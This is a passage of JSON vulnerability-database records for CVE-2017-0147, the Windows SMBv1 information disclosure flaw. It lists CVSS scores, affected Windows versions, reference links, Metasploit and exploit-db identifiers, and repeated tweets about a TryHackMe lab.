"modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 77}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 4.6, "vector": "NONE"}}, "hash": "d864804ce4e34f2a5feb0e863a5f8e0e5605f6fc4eda1878d4483a36c23f1041", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bf1f670b69a274ab442a5372b2d4378c", "key": "references"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 77}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 4.6, "vector": "NONE"}}, "hash": "8d814749703ee667e166082bd64cbf92f356b404043e09a79622f5a3ade19ac4", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "750b16738b000f87940d09b1ba668640", "key": "references"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 51}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 4.6, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/td_dixit/status/1349910672750985216", "text": "Blue - I have just completed this room! Check it out: https://t.co/FGWdT3Euk8?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "446eb6405cb1d6a5e458adf080d3024764b84e69733e72dc0adc1cb32a4f3cf9", "hashmap": [{"hash": 